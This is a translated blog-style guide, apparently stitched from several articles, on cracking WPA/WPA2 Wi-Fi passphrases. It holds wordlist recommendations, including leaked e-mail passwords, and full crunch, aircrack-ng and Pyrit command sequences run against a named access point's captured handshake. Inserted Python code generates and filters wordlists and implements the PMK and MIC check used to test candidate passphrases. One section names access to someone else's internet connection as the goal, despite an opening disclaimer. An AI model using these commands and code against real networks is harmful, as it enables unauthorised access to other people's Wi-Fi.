
The best dictionaries for WPA2 brute force. Cracking handshakes in Pyrit is the fastest way, using GPUs and hash precomputation. Importing a dictionary into Pyrit

Hello! This is a companion article to my main wireless security series, devoted to choosing Wi-Fi password dictionaries: only the useful ones, without padding.

You may disagree with me on many points; the comments are open for discussion, and helping each other is encouraged.

This article has been prepared solely to improve your own information security skills. The WiFiGid project is categorically against using this information on other people's networks without the prior consent of their owners. Let's get along and not harm other people!

A bit of theory first

The dictionaries themselves are further down. Here I could not resist trying to spell out the problems with Wi-Fi brute-force methods. What approaches exist?

  1. Classic online brute force: trying to connect to the access point and checking each password live. This method is obsolete; do not use this anachronism.
  2. Capturing the handshake and cracking it offline in aircrack-ng or hashcat: the technique that actually works and lets you use all the power of your computer. I assume this is what you came for.
  3. Brute-forcing WPS: it also has its place, but the second method is used more often.

The important point for the second approach is this:

Passwords come in different lengths. Do not use a dictionary without considering what it was built for.

Here are a few of my thoughts:

  • With WPA/WPA2-PSK the passphrase is 8 to 63 characters, so anything shorter is useless (unless you are lucky enough to run into a WEP network).
  • People very often use numbers in passwords: phone numbers and dates.
  • Popular leaked password lists, for example from e-mail dumps, are useful too: home hotspot passwords often coincide with them. So it makes sense to run the popular password lists (entries of 8 characters or longer, of course).
  • If nothing else helps, there is exhaustive enumeration. Ready-made lists exist, but I prefer the Crunch generator: set exactly the conditions YOU need and get a list.

Using your head raises the odds of guessing the password enormously.

Current dictionaries

Theory done; now the ready-made dictionaries. If you have your own, post it in the comments with an explanation. Comments are moderated, not everything will get through; we do not need rubbish here.

Here is what is available and usable, the most popular password dictionaries for Russia and the CIS (.dic and .txt, all plain text files):

  • TOP Wi-Fi passwords for WPA, WPA2, WPA3 (a list of common passwords; note that a WPA3-SAE exchange cannot be cracked offline from a capture the way a WPA2 handshake can)
  • TOP 9 million
  • E-mail password list
  • Dates and birthdays
  • Phone numbers: Russia, Ukraine, Belarus
  • 8-digit numbers
  • 9-digit numbers

Alternatives

Here are a few alternative ways of getting at a password; maybe they will be useful to someone:

  • Generators: Crunch and John the Ripper let you build lists for your own specific ideas. But as a rule, grinding through exhaustively generated lists takes a very long time, even on the most modern hardware.

  • Online services (no links, since there are crooks among them) that have already cracked many handshakes or will take yours on, for a fee of course; sometimes it is worth it.

Kali dictionaries

Every Kali Linux user already has these dictionaries, so feel free to use them and download nothing. Below is the list with a few explanations, although what was given above is quite enough for normal work, with varying degrees of success.

  • RockYou (/usr/share/wordlists/rockyou.txt.gz, unpack it with gunzip) is the most popular pentest dictionary for any job. It can be used for Wi-Fi too, but I recommend first removing the unsuitable entries with pw-inspector.

That's all. If you have something to offer, post it in the comments below. We'll look at it and sort it out, but without the rubbish.

About dictionaries for aircrack-ng.

The first thing to understand: ABSOLUTELY ALL the steps given in articles like this (for aircrack-ng included) are nothing but a rat race without a VERY good dictionary, because the number of possible password combinations is, for practical purposes, unbounded. So I warn you right away: everything you do may turn out to be pointless if the user happened to protect his wireless access point with an arbitrary combination like this:

... obtained simply by hammering the keyboard at random. The method considered here for WPA and WPA2 is a dictionary attack, and that is exactly its problem: the dictionary must contain, among everything else, the password the victim invented. (WEP is a different case: its key is recovered statistically from captured traffic, not guessed from a dictionary.) What are the odds that the dictionary you downloaded or compiled contains a combination like the one above? The structure of the password is unknown, so you brute-force blind.

Hackers do not live by aircrack-ng alone. A password, and not only a Wi-Fi one, can be obtained in other ways. Read on:

Without a dictionary, no way at all. Alas. I warn you in advance: avoid the old foreign dictionaries from around 2010. The net is full of them and they are uniformly useless, as you will find out yourself. As for the author of this article, he was rarely let down by one particular dictionary. There is just one problem: the archive of this txt "dictionary" alone weighs about 14 GB, which is a bit much. A cosmic number of keyboard combinations was generated and then filtered down to the most common ones; maybe your password will turn up there. It goes without saying that a file of this size should be downloaded on its own, not alongside other downloads, and with browsers closed. It would be a shame, after all that waiting, to hit an error when opening the password file and have to download it again.

So, how it works. For WEP there are other options (Kali has plenty of utilities for recovering WEP keys), but for stronger protection such as WPA2 (today the most common kind), only the dictionary or brute-force option is possible, including in our case. Cracking Wi-Fi from an airodump-ng capture works only this way and no other. That is the method's single but significant drawback, and it applies equally to the other tools that try passwords from a dictionary.

"Official" dictionaries for aircrack

There are no special requirements. Format: a text file with one password per line. Content: Latin letters of both cases, Arabic numerals and a few symbols.

Dictionaries for aircrack: where to get them?

If you want the ready-made dictionaries for aircrack, which have no advantage over more modern ones, I will again send you to the official site:

http://www.aircrack-ng.org/

where these dictionaries are offered for download via links to third-party resources. Have a look anyway; you will end up on that site in any case while searching the net for aircrack dictionaries.

Next. The net is full of other suitable dictionaries that duplicate one another. Many "hackers" work like this: rename someone else's list, maybe dilute it with a few entries of their own, pack it up, done. Nobody is immune to this. So you will have to search.

The next problem with foreign dictionaries is that even the best of them are built on the principle "whatever passwords we learned, we added to the list". The problem for us is that in Russia passwords are usually made up differently. So even the best dictionary of 300 million keys may well "refuse" you after 9 to 12 hours of waiting.

The main problem, as already mentioned, is dictionary size. There are real masterpieces on the net, almost all from across the ocean. Psychologists and other specialists even took part in building them (according to their authors), trying to reproduce the most frequent "monkey on a piano" random character sets. After all, the recipe for the best password is:

  • open a text editor
  • close your eyes
  • hit the keyboard with all ten fingers at once
  • dilute the result with characters like @, #, $ and so on, and put an uppercase letter at the end; this is not "qwerty" for you...
  • copy the result and use it as your password. You will not be able to remember it, but it will take a cracker 150 years to find it.

Dictionaries for aircrack: make your own.

I will be brief. We use Crunch, which ships with Kali. It generates wordlists exhaustively from a character set or pattern (not random passwords) and has a number of useful options. Some of them are very handy if, for example, you managed to see part of the victim's password, i.e. you know some of the characters.

The generation process is simple. Open a terminal and run a command in the form:

crunch 7 8 -o /root/Desktop/dict

This creates a dictionary called dict on the Desktop with every combination of 7 to 8 characters, a normal password length. Note that when no character set is given, crunch uses only lowercase Latin letters (a-z); it does not add digits or uppercase by itself. Convenient, right? No dictionaries for aircrack to download... Don't celebrate yet: take a closer look at the size:

Yes, yes, only about 2 terabytes. Sad.

What can you do? Add options that narrow the passwords down, if you have reason to. The command can then take the form:

crunch 7 8 9876543210 -o /root/Desktop/dict.lst

where 9876543210 is exactly and only the set of characters that will occur in the generated dictionary, nothing else. Or:

In this case Crunch will build a dictionary of passwords made only from the characters you specify.

Many such dictionaries can be built, and believe me, sometimes this approach really works. They will not weigh much, they are portable, and they are easy to keep on external media. In the cracking command you can then list the dictionaries you created, separated by commas (if your home-made aircrack dictionaries are stored on the Kali Desktop):

aircrack-ng /root/filename.cap -w /root/Desktop/dict1,/root/Desktop/dict2,/root/Desktop/dict3

Each comma-separated entry after -w is a separate path, so give the full path for every file: writing /root/Desktop/dict1,dict2,dict3 would make aircrack-ng look for dict2 and dict3 in the current directory.
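Before starting a crunch run it pays to know how big the output will be; the following is an added example (not from the original article, and not using crunch itself) that estimates the size of the two runs shown above and builds the kind of targeted lists the text recommends (digits only, a known prefix, dates). The prefix, year range and output path used in the demo are illustrative assumptions.

```python
"""Added example: size estimation for crunch-style wordlists and small targeted
generators. Not part of the original article; crunch is not required."""
import itertools
from datetime import date, timedelta
from typing import Iterator

LOWER = "abcdefghijklmnopqrstuvwxyz"  # crunch's default charset when none is given
DIGITS = "0123456789"


def wordlist_bytes(min_len: int, max_len: int, charset_size: int) -> int:
    """Bytes on disk for every string of length min_len..max_len over a charset,
    one per line with a trailing newline: sum over n of charset_size**n * (n + 1)."""
    return sum(charset_size ** n * (n + 1) for n in range(min_len, max_len + 1))


def human_size(n: int) -> str:
    """Decimal units, the way disk vendors and the article count them."""
    for unit, scale in (("TB", 10 ** 12), ("GB", 10 ** 9), ("MB", 10 ** 6)):
        if n >= scale:
            return f"{n / scale:.2f} {unit}"
    return f"{n} B"


def generate(min_len: int, max_len: int, charset: str) -> Iterator[str]:
    """Exhaustive generation in crunch order (`crunch MIN MAX CHARSET`), streamed
    so nothing of dictionary size is ever held in memory."""
    for n in range(min_len, max_len + 1):
        for combo in itertools.product(charset, repeat=n):
            yield "".join(combo)


def with_prefix(prefix: str, suffix_len: int, charset: str = DIGITS) -> Iterator[str]:
    """Known prefix plus an exhaustive suffix: a phone number whose country and
    operator code you know, or an AP name followed by digits."""
    for suffix in generate(suffix_len, suffix_len, charset):
        yield prefix + suffix


def dates(year_from: int, year_to: int, fmt: str = "%d%m%Y") -> Iterator[str]:
    """Every calendar date in the range as an 8-digit string (DDMMYYYY by default),
    a popular passphrase shape; leap days included."""
    d = date(year_from, 1, 1)
    while d.year <= year_to:
        yield d.strftime(fmt)
        d += timedelta(days=1)


def write_wordlist(words: Iterator[str], path: str) -> int:
    """Write one candidate per line; returns the number of lines written."""
    count = 0
    with open(path, "w", encoding="ascii") as f:
        for w in words:
            f.write(w + "\n")
            count += 1
    return count


if __name__ == "__main__":
    # The two runs from the text: lowercase 7-8 chars (the "2 terabytes") vs digits only.
    print("crunch 7 8            :", human_size(wordlist_bytes(7, 8, len(LOWER))))
    print("crunch 7 8 9876543210 :", human_size(wordlist_bytes(7, 8, len(DIGITS))))
    # A targeted list: 8-digit dates for an assumed range of birth years.
    n = write_wordlist(dates(1950, 2015), "/tmp/dates.lst")
    print("dates 1950-2015       :", n, "candidates")
```

The estimate for `crunch 7 8` with the default charset comes out at 1.94 TB, matching the article's "about 2 terabytes"; the digits-only run is under 1 GB. Running the script writes the dates list to /tmp/dates.lst, which you can pass to aircrack-ng -w like any other file.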

Again, a BUT

Using programs like Crunch or John the Ripper is not quite the option that helps a professional cracker. There are several reasons. I could not get the script to work in any way that would split the cracking of a password combination into several stages (meaning from session to session, from one reboot to the next). That means the cracking process can drag on for months, against the background of a sharp drop in the computer's performance (by half, I think). And in the end, as an option, a separate machine for brute force? An unaffordable luxury, generally speaking. The best result for me came from working with a DUAL video card on 64-bit Windows 7. That process is described in the article.

Dictionaries for aircrack: online services.

It would be strange if nobody had turned up offering this. And indeed, for 3 or 4 years now there has been a service that offers, among other things, password selection from a dictionary. It is located at:

It boasts the shortest password recovery times and a dictionary of 600 million keys. I know of no reviews because I have not used it. Why? 17 US dollars per key (at the time of writing), no less. You need the same things as for a local dictionary attack: enter the victim's BSSID, give the path to the .cap file, and finally an e-mail address. I assume they first tell you whether it succeeded and then demand payment; how and when, I do not know.

ATTENTION. Proceed at your own risk. If I were the creators of such a resource, I could not resist cheating anyone willing to transfer money to me just like that... But I repeat: I do not know, I have not used it. In any case, many search engines flag the link to it as malicious, so I had to delete it, but the address is clearly visible in the site header in the picture. Whoever uses it, report back.

So, even the best dictionary is no panacea. Let's look at another method:


Wi-Fi brute-force dictionaries are routinely used by professional hackers in their work. Of course, you also need specialised software that works with the dictionary database.

The programs themselves are easy to download from any open source, but good brute-force dictionaries you will have to look for, and a good one is a rare and very valuable find on the net.

A professional understands all this without further explanation, but for a less experienced audience the terminology is a curiosity. An ordinary user cannot see why a Wi-Fi WPA2 brute force would be needed, how to use it, and what all of this "goes with".

What brute force is

Brute force is a way of recovering a password by trying candidate combinations. Your computer can find the password if you have suitable software and a dictionary database.

It can be used almost anywhere a system is password-protected: a mailbox, a social network page or anything else.

Here we talk specifically about brute-forcing access to a Wi-Fi router. The goal is access to someone else's internet connection, and that is where dictionaries, software and patience are required.

How to start brute-forcing Wi-Fi

First, distinguish the router's protection schemes: WPA and WPA2. Both can be attacked by dictionary guessing, and in fact both derive the key from the passphrase in the same way, so a captured handshake is checked offline identically in either case; neither is an easier target than the other for this attack.

The WPA2 dictionary is fed to software that generates candidates and checks them for a match. This procedure is lengthy and can take several days at least, but again it depends only on the complexity of the password itself.

But if you managed to download dictionaries from a reliable, proven source, you can count on a positive final result.

Are all dictionaries the same?

Start brute-forcing Wi-Fi only if you clearly understand every step and stage you will have to go through. Even Wi-Fi brute-force dictionaries differ greatly from one another, and using them is not always effective if you pick the wrong one.

Also consider the longest digit sequence in the dictionary you downloaded. Most often users choose 8-digit passwords, but there are dictionaries with 7- to 9-digit entries (remember that 7-digit entries are wasted on WPA, which requires at least 8 characters).

The Wi-Fi password dictionary should match your region: there are separate lists for English, Spanish, French and other languages. In our case we need a database of Russian password combinations.

Before loading dictionaries, take the trouble to open them in a text editor and make sure they are properly made and cover most of the popular combinations.

Cracking Wi-Fi from a phone screen

Wi-Fi brute force from an Android smartphone is quite realistic, since the corresponding software is freely available and can be downloaded without restrictions. After installation you use the same dictionaries, where you will probably find the password combination.

The best dictionaries on the web

We have collected the best dictionary databases for password selection and Wi-Fi brute force. You can easily check this: download our dictionaries to your computer and try them.

The dictionaries presented contain one of the largest collections of password combinations for Russian requests, and they are constantly improved and supplemented, which matters for new users.

Download dictionaries for Wi-Fi brute force (WPA, WPA2)

  • [Dates in various spellings]:
  • [A small dictionary of 9 million words]:
  • [Passwords of emails leaked in 2014]:

Benefits of using Pyrit

Cracking a captured handshake is the standard way to recover a WPA/WPA2-PSK passphrase. It is done by brute force, i.e. by trying candidate passphrases against the handshake.

By the way, if you are not yet familiar with the technique of capturing handshakes, see the article "".

Since brute force gives no guarantee of success, several techniques have been devised that significantly improve the odds:

  • using graphics cards for guessing (greatly increases the candidate rate)
  • using tables of precomputed hashes (more speed, plus reuse for the same access point: dozens of handshakes from one AP can be checked in seconds, because the expensive part, the PMK, depends only on the ESSID and the passphrase and not on the particular handshake)
  • using good dictionaries (increases the chance of success)

Pyrit uses all of these techniques, which is why it is the fastest WPA/WPA2 password cracker, or one of the top two alongside oclHashcat.

Other programs implement some of these techniques. Both oclHashcat and coWPAtty do dictionary attacks. coWPAtty has hash precomputation (its genpmk tool) but no support for graphics cards. oclHashcat uses the power of graphics cards but does not precompute hashes. Looking ahead: with oclHashcat it is still possible to arrange a preliminary calculation and reuse the result for one access point, checking several handshakes without spending the hash-computation time again; how to do that will be described later. Aircrack-ng iterates over a dictionary and makes efficient use of multi-core processors, but uses no other speed-ups.

On my system oclHashcat cracks WPA/WPA2 passwords at 31550 H/s, while Pyrit computes 38000 to 40000 PMK/s; checking the handshake afterwards takes less than a second. So even for a single handshake the rate is roughly a quarter to a third higher, and if we want to check several handshakes for one AP, oclHashcat has to start over from scratch while in Pyrit each additional handshake takes a fraction of a second.

For Pyrit to unleash its full power, the proprietary graphics driver must be installed. See the article "" and the material it references: it explains step by step how to install the driver and Pyrit in Kali Linux 2 on a computer with an AMD graphics card. Do all the steps, not just the last instruction. I do not have an NVIDIA computer, so I have no up-to-date instructions for installing the driver and Pyrit on NVIDIA-based systems.

The fastest WPA/WPA2 password cracking

My starting data:

  • target AP: DANIELLE2015
  • the file with the previously captured handshake: DANIELLE2015-01.cap

Dictionary for WPA/WPA2 cracking

I will use the rockyou dictionary that ships with Kali Linux. For practice it is quite enough, but for real attacks I recommend generated dictionaries of phone numbers and dictionaries generated for specific APs of the form AP name + digits, padded out to at least eight characters.

Copy the dictionary file to root's home directory:

cp /usr/share/wordlists/rockyou.txt.gz .

Unpack it:

gunzip rockyou.txt.gz

Since a WPA2 passphrase must be at least 8 characters (and at most 63), filter out every entry outside that range (you can skip this step entirely; it is up to you) and save the result as newrockyou.txt:

sort -u rockyou.txt | pw-inspector -m 8 -M 63 > newrockyou.txt

Note that sorting discards rockyou's most-common-first ordering; if you want the likeliest candidates tried first, dedupe without sorting (pw-inspector itself works line by line and does not care about order).

Let's see how many passwords this file contains:

wc -l newrockyou.txt

It contains 9606665 passwords.

The original file contains even more:

wc -l rockyou.txt

That is 14344392 passwords. So the file got shorter, which means we can test the AP in less time.

Finally, rename the file to wpa.lst:

mv newrockyou.txt wpa.lst
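The pw-inspector step above only checks length. As an added example (not part of the original article, and not pw-inspector's code), the filter below also drops entries that are not printable ASCII, which the standard does not allow in a WPA-PSK passphrase, dedupes while keeping the list's original most-common-first order, and works on raw bytes because rockyou contains lines that are not valid UTF-8. The sample lines are constructed, not taken from rockyou.

```python
"""Added example: reduce a raw leaked-password list to valid WPA/WPA2-PSK passphrases."""
from typing import Dict, Iterable, Iterator, List, Tuple

MIN_LEN, MAX_LEN = 8, 63  # IEEE 802.11i: a passphrase is 8..63 printable ASCII characters


def new_stats() -> Dict[str, int]:
    return {"kept": 0, "too_short": 0, "too_long": 0, "non_ascii": 0, "duplicate": 0}


def is_valid_wpa_passphrase(candidate: bytes) -> bool:
    """Length 8..63 and every byte in the printable ASCII range 0x20..0x7E."""
    return MIN_LEN <= len(candidate) <= MAX_LEN and all(0x20 <= b <= 0x7E for b in candidate)


def filter_lines(lines: Iterable[bytes], stats: Dict[str, int]) -> Iterator[bytes]:
    """Yield kept candidates in their original order; record why each other line was dropped.
    Only the set of seen candidates is held in memory, so this streams over a 14-million-line file."""
    seen = set()
    for raw in lines:
        line = raw.rstrip(b"\r\n")
        if len(line) < MIN_LEN:
            stats["too_short"] += 1
        elif len(line) > MAX_LEN:
            stats["too_long"] += 1
        elif not is_valid_wpa_passphrase(line):
            stats["non_ascii"] += 1
        elif line in seen:
            stats["duplicate"] += 1
        else:
            seen.add(line)
            stats["kept"] += 1
            yield line


def filter_wordlist(lines: Iterable[bytes]) -> Tuple[List[bytes], Dict[str, int]]:
    """In-memory variant for small lists and tests."""
    stats = new_stats()
    kept = list(filter_lines(lines, stats))
    return kept, stats


def filter_file(src: str, dst: str) -> Dict[str, int]:
    """Streaming variant: e.g. filter_file("rockyou.txt", "wpa.lst")."""
    stats = new_stats()
    with open(src, "rb") as fin, open(dst, "wb") as fout:
        for candidate in filter_lines(fin, stats):
            fout.write(candidate + b"\n")
    return stats


# Constructed sample lines (not from rockyou): short, duplicate, UTF-8 and binary junk,
# an over-long entry, and a CRLF-terminated line.
SAMPLE = [
    b"123456\n",
    b"password\n",
    b"iloveyou\n",
    b"password\n",
    b"princess\n",
    b"pa\xc3\xb1uelo123\n",
    b"\xff\xfeDanielle2015\n",
    b"a" * 70 + b"\n",
    b"Danielle2015\r\n",
]

if __name__ == "__main__":
    kept, stats = filter_wordlist(SAMPLE)
    print([k.decode() for k in kept])
    print(stats)
```

Dropping the non-ASCII entries shrinks the list a little further than pw-inspector does and saves PBKDF2 work on candidates that no supplicant could ever have accepted.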

Create the ESSID in the Pyrit database

Now we need to create the ESSID in the Pyrit database:

pyrit -e DANIELLE2015 create_essid

WARNING: if the AP name contains a space, such as "NetComm Wireless", quote it:

pyrit -e "NetComm Wireless" create_essid

Great, the ESSID has been added to the Pyrit database.

Importing a dictionary into Pyrit

Now that the ESSID is in the Pyrit database, let's import the password dictionary.

Use the following command to import the prepared wpa.lst dictionary into the Pyrit database:

pyrit -i /root/wpa.lst import_passwords

Create tables in Pyrit with the batch process

It's easy, just run:

pyrit batch

Since this is running on a laptop, I get 38000 to 40000 PMK/s. That is far from the limit: a desktop with a good graphics card will speed up these calculations considerably.

Watch how big your dictionary file is and how HOT your CPU and GPU get. Use additional cooling to avoid damage.

Cracking with Pyrit

We attack the handshake using the database of precomputed hashes. After all the preparation above, launching the attack is trivial. Just run:

pyrit -r DANIELLE2015-01.cap attack_db

That's all. The whole process, including the precomputation of hashes, took a few minutes. Walking the whole database table to find the password, if it is in the dictionary, took less than a second, at a reported rate of 6322696 PMK/s. It is by far the fastest.

The check itself takes seconds, so it is always worth running against any other handshake captured from the same AP, even when the first one yielded nothing.

Handshake attack with a dictionary in Pyrit without precomputed tables

If you do not feel like building a database and want to work on the dictionary file directly (which is much slower), do the following:

pyrit -r DANIELLE2015-01.cap -i /root/wpa.lst attack_passthrough

The speed of this method? 17807 PMK/s. Much too slow for my taste.
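What the two modes above actually do, and why the precomputed-table technique from the list of speed-ups earlier in this article pays off, is easiest to see in code. The following is an added example, not from the original article and not Pyrit's own code: it derives the PMK with PBKDF2 the way WPA/WPA2-PSK specifies, derives the KCK from the PMK and the handshake nonces, and checks the candidate by recomputing the EAPOL MIC, which is exactly the check a cracker performs. The handshake, MAC addresses, nonces and key data are constructed stand-ins; the passphrase/ESSID test vector ("password"/"IEEE") is the one from the IEEE 802.11i annex.

```python
"""Added example: WPA/WPA2-PSK candidate checking, attack_db vs attack_passthrough."""
import hashlib
import hmac
from typing import Dict, Iterable, NamedTuple, Optional

PBKDF2_ITERATIONS = 4096     # fixed by WPA/WPA2-PSK
MIC_OFFSET = 81              # MIC field in an EAPOL-Key frame: 4-byte 802.1X header + 77 descriptor bytes
PBKDF2_CALLS = {"count": 0}  # instrumentation only: how often the expensive step ran


def pmk_from_passphrase(passphrase: str, essid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096, 32 bytes). The ESSID is the salt,
    so a PMK table computed for one network name is useless for another."""
    pw = passphrase.encode("ascii")
    if not 8 <= len(pw) <= 63:
        raise ValueError("WPA passphrase must be 8..63 ASCII characters")
    PBKDF2_CALLS["count"] += 1
    return hashlib.pbkdf2_hmac("sha1", pw, essid.encode("utf-8"), PBKDF2_ITERATIONS, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, cut to 64 bytes."""
    blocks = [hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest() for i in range(4)]
    return b"".join(blocks)[:64]


class Handshake(NamedTuple):
    essid: str
    ap_mac: bytes       # authenticator address, 6 bytes
    sta_mac: bytes      # supplicant address, 6 bytes
    anonce: bytes       # 32 bytes, from message 1
    snonce: bytes       # 32 bytes, from message 2
    eapol: bytes        # EAPOL-Key frame of message 2, MIC field included
    wpa2: bool = True   # WPA2/CCMP: HMAC-SHA1-128 MIC; WPA/TKIP: HMAC-MD5


def kck_from_pmk(pmk: bytes, hs: Handshake) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(ANonce,SNonce)||max(ANonce,SNonce)).
    The first 16 bytes (KCK) key the EAPOL MIC. Cheap next to PBKDF2."""
    data = (min(hs.ap_mac, hs.sta_mac) + max(hs.ap_mac, hs.sta_mac)
            + min(hs.anonce, hs.snonce) + max(hs.anonce, hs.snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)[:16]


def eapol_mic(kck: bytes, eapol: bytes, wpa2: bool) -> bytes:
    """MIC over the frame with its own MIC field zeroed."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    if wpa2:
        return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]
    return hmac.new(kck, zeroed, hashlib.md5).digest()


def pmk_matches(pmk: bytes, hs: Handshake) -> bool:
    captured = hs.eapol[MIC_OFFSET:MIC_OFFSET + 16]
    return hmac.compare_digest(eapol_mic(kck_from_pmk(pmk, hs), hs.eapol, hs.wpa2), captured)


def build_table(wordlist: Iterable[str], essid: str) -> Dict[str, bytes]:
    """'pyrit batch': one PBKDF2 per (ESSID, candidate), computed once and stored."""
    return {w: pmk_from_passphrase(w, essid) for w in wordlist}


def attack_db(table: Dict[str, bytes], hs: Handshake) -> Optional[str]:
    """'pyrit attack_db': only PRF + HMAC per candidate; PBKDF2 never runs here."""
    for passphrase, pmk in table.items():
        if pmk_matches(pmk, hs):
            return passphrase
    return None


def attack_passthrough(wordlist: Iterable[str], hs: Handshake) -> Optional[str]:
    """'pyrit attack_passthrough': PBKDF2 redone for every candidate, for every handshake."""
    for passphrase in wordlist:
        if pmk_matches(pmk_from_passphrase(passphrase, hs.essid), hs):
            return passphrase
    return None


def forge_handshake(passphrase: str, essid: str, anonce: bytes, snonce: bytes) -> Handshake:
    """Constructed stand-in for a captured message 2 (made-up MACs, dummy key data);
    only the frame layout and the MIC are computed as a real supplicant would."""
    ap_mac, sta_mac = bytes.fromhex("001122aabbcc"), bytes.fromhex("ddeeff001122")
    key_data = b"\x30\x14" + b"\x00" * 20                                 # dummy RSN IE
    descriptor = (b"\x02" + b"\x01\x0a" + b"\x00\x10" + b"\x00" * 8        # type, key info, key len, replay ctr
                  + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8)     # nonce, IV, RSC, ID
    body = descriptor + b"\x00" * 16 + len(key_data).to_bytes(2, "big") + key_data
    frame = b"\x02\x03" + len(body).to_bytes(2, "big") + body
    hs = Handshake(essid, ap_mac, sta_mac, anonce, snonce, frame)
    mic = eapol_mic(kck_from_pmk(pmk_from_passphrase(passphrase, essid), hs), frame, True)
    return hs._replace(eapol=frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:])


if __name__ == "__main__":
    words = ["12345678", "password", "danielle2015", "qwertyuiop"]   # assumed mini wordlist
    hs1 = forge_handshake("danielle2015", "DANIELLE2015", b"\x11" * 32, b"\x22" * 32)
    hs2 = forge_handshake("danielle2015", "DANIELLE2015", b"\x33" * 32, b"\x44" * 32)
    table = build_table(words, "DANIELLE2015")                          # the slow part, once
    PBKDF2_CALLS["count"] = 0
    print("attack_db hs1:", attack_db(table, hs1), "| hs2:", attack_db(table, hs2),
          "| PBKDF2 calls during attack_db:", PBKDF2_CALLS["count"])
    print("attack_passthrough hs1:", attack_passthrough(words, hs1),
          "| PBKDF2 calls:", PBKDF2_CALLS["count"])
```

The second handshake for DANIELLE2015 is resolved from the same table without a single PBKDF2 call, which is the "fraction of a second per additional handshake" the article reports for attack_db; attack_passthrough pays the 4096 iterations again for every candidate. A table built for a different ESSID finds nothing, since the ESSID is the PBKDF2 salt.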

Cleaning up Pyrit and the database

Finally, if needed, you can delete the ESSID and everything computed for it:

pyrit -e DANIELLE2015 delete_essid

This frees up quite a lot of disk space.
